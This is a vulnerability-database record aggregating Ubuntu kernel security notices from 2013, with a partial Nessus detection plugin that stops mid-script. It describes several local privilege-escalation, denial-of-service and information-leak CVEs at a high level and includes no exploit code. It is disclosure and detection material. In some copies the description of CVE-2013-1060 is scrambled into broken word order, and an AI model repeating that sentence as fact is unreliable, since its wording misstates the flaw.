{"id": "USN-1945-1", "bulletinFamily": "unix", "title": "Linux kernel (OMAP4) vulnerabilities", "description": "A denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service by creating a \nlarge number of files with names that have the same CRC32 hash value. \n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service (prevent file \ncreation) for a victim, by creating a file with a specific CRC32C hash \nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows for privilege escalation. A local user could exploit this flaw to \nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it \nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a \nguest OS. A privileged user in the guest OS could exploit this flaw to \ndestroy data on the disk, even though the guest OS should not be able to \nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to \nconnect to an IPv4 destination. An unprivileged local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation \nin the Linux kernel. An local user could exploit this flaw to examine \npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux \nkernel when the IPV6_MTU setsockopt option has been specified in \ncombination with the UDP_CORK option. A local user could exploit this flaw \nto cause a denial of service (system crash). (CVE-2013-4163)", "published": "2013-09-06T00:00:00", "modified": "2013-09-06T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://ubuntu.com/security/notices/USN-1945-1", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2013-1060", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-5375", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-2234", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-4162", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-2140", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-2232", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-4163", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-5374"], "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "type": "ubuntu", "lastseen": "2020-07-09T01:43:08", "edition": 5, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "ubuntu", "idList": ["USN-2018-1", "USN-2017-1", "USN-1946-1", "USN-1938-1", "USN-1940-1", "USN-1943-1", "USN-1944-1", "USN-1947-1", "USN-1941-1", "USN-1942-1"]}, {"type": "nessus", "idList": ["UBUNTU_USN-1941-1.NASL", "FEDORA_2013-12530.NASL", "UBUNTU_USN-1943-1.NASL", "UBUNTU_USN-1938-1.NASL", "UBUNTU_USN-1944-1.NASL", "FEDORA_2013-12990.NASL", "UBUNTU_USN-2017-1.NASL", "SUSE_11_KERNEL-130827.NASL", "UBUNTU_USN-1947-1.NASL", "DEBIAN_DSA-2745.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310841542", "OPENVAS:1361412562310841546", "OPENVAS:841552", "OPENVAS:841540", "OPENVAS:1361412562310841552", "OPENVAS:1361412562310841547", "OPENVAS:841547", "OPENVAS:841546", "OPENVAS:1361412562310841540", "OPENVAS:841542"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13265", "SECURITYVULNS:DOC:29791", "SECURITYVULNS:DOC:29790"]}, {"type": "cve", "idList": ["CVE-2013-4162", "CVE-2013-2140", "CVE-2013-2234", "CVE-2012-5374", "CVE-2012-5375", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163"]}, {"type": "f5", "idList": ["F5:K48726314"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2745-1:9CD12"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1474-1", "SUSE-SU-2013:1473-1"]}, {"type": "redhat", "idList": ["RHSA-2013:1166", "RHSA-2013:1264"]}, {"type": "exploitdb", "idList": ["EDB-ID:38132"]}, {"type": "seebug", "idList": ["SSV:60846"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1166", "ELSA-2013-1166-1"]}], "modified": "2020-07-09T01:43:08", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2020-07-09T01:43:08", "rev": 2}, "vulnersScore": 6.7}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.5.0-232-omap4", "packageVersion": "3.5.0-232.48"}], "scheme": null, "immutableFields": []}

{"ubuntu": [{"lastseen": "2020-07-09T01:34:25", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "A denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service by creating a \nlarge number of files with names that have the same CRC32 hash value. \n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service (prevent file \ncreation) for a victim, by creating a file with a specific CRC32C hash \nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows for privilege escalation. A local user could exploit this flaw to \nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it \nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a \nguest OS. A privileged user in the guest OS could exploit this flaw to \ndestroy data on the disk, even though the guest OS should not be able to \nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to \nconnect to an IPv4 destination. An unprivileged local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation \nin the Linux kernel. An local user could exploit this flaw to examine \npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux \nkernel when the IPV6_MTU setsockopt option has been specified in \ncombination with the UDP_CORK option. A local user could exploit this flaw \nto cause a denial of service (system crash). (CVE-2013-4163)", "edition": 5, "modified": "2013-09-06T00:00:00", "published": "2013-09-06T00:00:00", "id": "USN-1944-1", "href": "https://ubuntu.com/security/notices/USN-1944-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:40:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "A denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service by creating a \nlarge number of files with names that have the same CRC32 hash value. \n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service (prevent file \ncreation) for a victim, by creating a file with a specific CRC32C hash \nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows for privilege escalation. A local user could exploit this flaw to \nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it \nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a \nguest OS. A privileged user in the guest OS could exploit this flaw to \ndestroy data on the disk, even though the guest OS should not be able to \nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to \nconnect to an IPv4 destination. An unprivileged local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation \nin the Linux kernel. An local user could exploit this flaw to examine \npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux \nkernel when the IPV6_MTU setsockopt option has been specified in \ncombination with the UDP_CORK option. A local user could exploit this flaw \nto cause a denial of service (system crash). (CVE-2013-4163)", "edition": 6, "modified": "2013-09-07T00:00:00", "published": "2013-09-07T00:00:00", "id": "USN-1947-1", "href": "https://ubuntu.com/security/notices/USN-1947-1", "title": "Linux kernel (Quantal HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:40:58", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "A denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service by creating a \nlarge number of files with names that have the same CRC32 hash value. \n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service (prevent file \ncreation) for a victim, by creating a file with a specific CRC32C hash \nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows for privilege escalation. A local user could exploit this flaw to \nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it \nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a \nguest OS. A privileged user in the guest OS could exploit this flaw to \ndestroy data on the disk, even though the guest OS should not be able to \nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to \nconnect to an IPv4 destination. An unprivileged local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation \nin the Linux kernel. An local user could exploit this flaw to examine \npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux \nkernel when the IPV6_MTU setsockopt option has been specified in \ncombination with the UDP_CORK option. A local user could exploit this flaw \nto cause a denial of service (system crash). (CVE-2013-4163)", "edition": 5, "modified": "2013-09-06T00:00:00", "published": "2013-09-06T00:00:00", "id": "USN-1946-1", "href": "https://ubuntu.com/security/notices/USN-1946-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:39:47", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140"], "description": "Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows specified to be run as root. A local could exploit this flaw to run \ncommands as root when using the perf tool. user could exploit this \n(CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it \nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a \nguest OS. A privileged user in the guest OS could exploit this flaw to \ndestroy data on the disk, even though the guest OS should not be able to \nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to \nconnect to an IPv4 destination. An unprivileged local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation \nin the Linux kernel. An local user could exploit this flaw to examine \npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux \nkernel when the IPV6_MTU setsockopt option has been specified in \ncombination with the UDP_CORK option. A local user could exploit this flaw \nto cause a denial of service (system crash). (CVE-2013-4163)", "edition": 5, "modified": "2013-09-05T00:00:00", "published": "2013-09-05T00:00:00", "id": "USN-1938-1", "href": "https://ubuntu.com/security/notices/USN-1938-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:15", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140"], "description": "Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows for privilege escalation. A local user could exploit this flaw to \nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it \nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a \nguest OS. A privileged user in the guest OS could exploit this flaw to \ndestroy data on the disk, even though the guest OS should not be able to \nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to \nconnect to an IPv4 destination. An unprivileged local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation \nin the Linux kernel. An local user could exploit this flaw to examine \npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux \nkernel when the IPV6_MTU setsockopt option has been specified in \ncombination with the UDP_CORK option. A local user could exploit this flaw \nto cause a denial of service (system crash). (CVE-2013-4163)", "edition": 5, "modified": "2013-09-06T00:00:00", "published": "2013-09-06T00:00:00", "id": "USN-1943-1", "href": "https://ubuntu.com/security/notices/USN-1943-1", "title": "Linux kernel (Raring HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:54", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2164"], "description": "Chanam Park reported a Null pointer flaw in the Linux kernel's Ceph client. \nA remote attacker could exploit this flaw to cause a denial of service \n(system crash). (CVE-2013-1059)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows for privilege escalation. A local user could exploit this flaw to \nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nJonathan Salwan discovered an information leak in the Linux kernel's cdrom \ndriver. A local user can exploit this leak to obtain sensitive information \nfrom kernel memory if the CD-ROM drive is malfunctioning. (CVE-2013-2164)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to \nconnect to an IPv4 destination. An unprivileged local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation \nin the Linux kernel. An local user could exploit this flaw to examine \npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nKees Cook discovered a format string vulnerability in the Linux kernel's \ndisk block layer. A local user with administrator privileges could exploit \nthis flaw to gain kernel privileges. (CVE-2013-2851)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux \nkernel when the IPV6_MTU setsockopt option has been specified in \ncombination with the UDP_CORK option. A local user could exploit this flaw \nto cause a denial of service (system crash). (CVE-2013-4163)", "edition": 5, "modified": "2013-09-06T00:00:00", "published": "2013-09-06T00:00:00", "id": "USN-1941-1", "href": "https://ubuntu.com/security/notices/USN-1941-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:41:09", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2164"], "description": "Chanam Park reported a Null pointer flaw in the Linux kernel's Ceph client. \nA remote attacker could exploit this flaw to cause a denial of service \n(system crash). (CVE-2013-1059)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows for privilege escalation. A local user could exploit this flaw to \nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nJonathan Salwan discovered an information leak in the Linux kernel's cdrom \ndriver. A local user can exploit this leak to obtain sensitive information \nfrom kernel memory if the CD-ROM drive is malfunctioning. (CVE-2013-2164)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to \nconnect to an IPv4 destination. An unprivileged local user could exploit \nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation \nin the Linux kernel. An local user could exploit this flaw to examine \npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nKees Cook discovered a format string vulnerability in the Linux kernel's \ndisk block layer. A local user with administrator privileges could exploit \nthis flaw to gain kernel privileges. (CVE-2013-2851)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux \nkernel when the IPV6_MTU setsockopt option has been specified in \ncombination with the UDP_CORK option. A local user could exploit this flaw \nto cause a denial of service (system crash). (CVE-2013-4163)", "edition": 5, "modified": "2013-09-06T00:00:00", "published": "2013-09-06T00:00:00", "id": "USN-1942-1", "href": "https://ubuntu.com/security/notices/USN-1942-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:40:04", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2147", "CVE-2012-5375", "CVE-2012-5374"], "description": "A denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service by creating a \nlarge number of files with names that have the same CRC32 hash value. \n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service (prevent file \ncreation) for a victim, by creating a file with a specific CRC32C hash \nvalue in a directory important to the victim. (CVE-2012-5375)\n\nDan Carpenter discovered an information leak in the HP Smart Array and \nCompaq SMART2 disk-array driver in the Linux kernel. A local user could \nexploit this flaw to obtain sensitive information from kernel memory. \n(CVE-2013-2147)", "edition": 5, "modified": "2013-11-08T00:00:00", "published": "2013-11-08T00:00:00", "id": "USN-2018-1", "href": "https://ubuntu.com/security/notices/USN-2018-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.0, "vector": "AV:L/AC:H/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:44:45", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2147", "CVE-2012-5375", "CVE-2012-5374"], "description": "A denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service by creating a \nlarge number of files with names that have the same CRC32 hash value. \n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the \nLinux kernel. A local user could cause a denial of service (prevent file \ncreation) for a victim, by creating a file with a specific CRC32C hash \nvalue in a directory important to the victim. (CVE-2012-5375)\n\nDan Carpenter discovered an information leak in the HP Smart Array and \nCompaq SMART2 disk-array driver in the Linux kernel. A local user could \nexploit this flaw to obtain sensitive information from kernel memory. \n(CVE-2013-2147)", "edition": 5, "modified": "2013-11-08T00:00:00", "published": "2013-11-08T00:00:00", "id": "USN-2017-1", "href": "https://ubuntu.com/security/notices/USN-2017-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.0, "vector": "AV:L/AC:H/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-09T00:22:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2206", "CVE-2013-1943", "CVE-2013-4162", "CVE-2013-1060"], "description": "Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that \nallows for privilege escalation. A local user could exploit this flaw to \nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nMichael S. Tsirkin discovered a flaw in how the Linux kernel's KVM \nsubsystem allocates memory slots for the guest's address space. A local \nuser could exploit this flaw to gain system privileges or obtain sensitive \ninformation from kernel memory. (CVE-2013-1943)\n\nA flaw was discovered in the SCTP (stream control transfer protocol) \nnetwork protocol's handling of duplicate cookies in the Linux kernel. A \nremote attacker could exploit this flaw to cause a denial of service \n(system crash) on another remote user querying the SCTP connection. \n(CVE-2013-2206)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the \nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-4162)", "edition": 5, "modified": "2013-09-06T00:00:00", "published": "2013-09-06T00:00:00", "id": "USN-1940-1", "href": "https://ubuntu.com/security/notices/USN-1940-1", "title": "Linux kernel (EC2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-04-01T07:22:54", "description": "A denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service by\ncreating a large number of files with names that have the same CRC32\nhash value. (CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service\n(prevent file creation) for a victim, by creating a file with a\nspecific CRC32C hash value in a directory important to the victim.\n(CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows specified to be run as root. A local could exploit this flaw to\nrun commands as root when using the perf tool. user could exploit this\n(CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP\nto a guest OS. A privileged user in the guest OS could exploit this\nflaw to destroy data on the disk, even though the guest OS should not\nbe able to write to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "published": "2013-09-07T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-quantal vulnerabilities (USN-1947-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1947-1.NASL", "href": "https://www.tenable.com/plugins/nessus/69812", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1947-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69812);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_bugtraq_id(56939, 56940, 60414, 60874, 60893, 61411, 61412, 62248);\n script_xref(name:\"USN\", value:\"1947-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-quantal vulnerabilities (USN-1947-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service by\ncreating a large number of files with names that have the same CRC32\nhash value. (CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service\n(prevent file creation) for a victim, by creating a file with a\nspecific CRC32C hash value in a directory important to the victim.\n(CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows specified to be run as root. A local could exploit this flaw to\nrun commands as root when using the perf tool. user could exploit this\n(CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP\nto a guest OS. A privileged user in the guest OS could exploit this\nflaw to destroy data on the disk, even though the guest OS should not\nbe able to write to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1947-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.5-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) 